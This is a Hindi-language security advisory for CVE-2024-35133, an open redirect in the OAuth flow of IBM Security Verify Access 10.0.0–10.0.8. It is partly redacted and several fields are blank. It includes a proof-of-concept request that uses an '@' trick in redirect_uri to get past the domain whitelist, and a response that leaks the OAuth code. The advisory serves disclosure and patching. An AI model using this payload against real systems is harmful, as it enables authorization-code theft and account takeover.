
CVE-2024-35133 के लिए सुरक्षा बुलेटिन - PoC के साथ
संशोधन: 1.0
प्रभाव:
किसी पीड़ित को विशेष रूप से तैयार की गई वेबसाइट पर जाने के लिए प्रेरित करके, एक दूरस्थ हमलावर इस कमजोरी का उपयोग करके प्रदर्शित URL को गलत साबित कर सकता है और उपयोगकर्ता को एक दुर्भावनापूर्ण वेबसाइट पर रीडायरेक्ट कर सकता है। इससे हमलावर अत्यधिक संवेदनशील जानकारी प्राप्त कर सकता है या पीड़ित के विरुद्ध आगे के हमले कर सकता है।
गंभीरता:
CVSS स्कोर:
CVE-ID: CVE-2024-35133
विक्रेता: IBM
प्रभावित उत्पाद:
प्रभावित संस्करण: 10.0.0 - 10.0.8
IBM Security Verify Access एक पूर्ण प्राधिकरण और नेटवर्क सुरक्षा नीति प्रबंधन समाधान है। यह भौगोलिक रूप से फैले इंट्रानेट और एक्सट्रानेट पर संसाधनों की अंत-से-अंत सुरक्षा प्रदान करता है।
कुछ प्रमुख विशेषताओं में शामिल हैं:
एक क्लाइंट के लिए OAuth प्रवाह के पेनिट्रेशन टेस्ट के दौरान, एक ओपन रीडायरेक्ट कमजोरी की खोज की गई, जिससे OAuth "code" वेरिएबल का रिसाव संभव हुआ।
OAuth प्रवाह के दौरान "redirect_uri" पैरामीटर को सत्यापित करने के लिए जिम्मेदार पार्सर के तर्क को दरकिनार करके (RFC 3986 का लाभ उठाकर), हमलावर IBM Security Verify Access में डोमेन व्हाइटलिस्ट फ़िल्टर में हेरफेर कर सकता है। इसके परिणामस्वरूप हमलावर द्वारा नियंत्रित किसी भी मनमाने डोमेन पर एक ओपन रीडायरेक्ट हुआ। पीड़ित को एक दुर्भावनापूर्ण साइट पर रीडायरेक्ट किया जा सकता है, जबकि डोमेन विश्वसनीय प्रतीत होता है।
इससे OAuth "code" टोकन जैसी संवेदनशील जानकारी का खुलासा हो सकता है या पीड़ित के विरुद्ध आगे के हमले हो सकते हैं।
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
पैच, अपग्रेड या सुझाए गए वर्कअराउंड जानकारी के लिए IBM सुरक्षा बुलेटिन 7166712 देखें।
अधिक विवरण के लिए संदर्भ देखें।
इस कमजोरी की खोज और रिपोर्ट निम्नलिखित द्वारा की गई:
कॉपीराइट (c) 2024 Giulio Garzia "Ozozuz"
इस चेतावनी के इलेक्ट्रॉनिक पुनर्वितरण की अनुमति है। स्पष्ट लिखित सहमति के बिना इसे संपादित नहीं किया जा सकता है। अन्य मीडिया में इस चेतावनी को पुनर्मुद्रित करने की अनुमति के लिए, लेखक से संपर्क करें।
अस्वीकरण: इस सलाहकार में दी गई जानकारी प्रकाशन के समय उपलब्ध आंकड़ों के आधार पर सटीक है। कोई वारंटी प्रदान नहीं की जाती है। इस जानकारी के उपयोग से उत्पन्न प्रत्यक्ष, अप्रत्यक्ष या परिणामी क्षति के लिए न तो लेखक और न ही प्रकाशक उत्तरदायी है।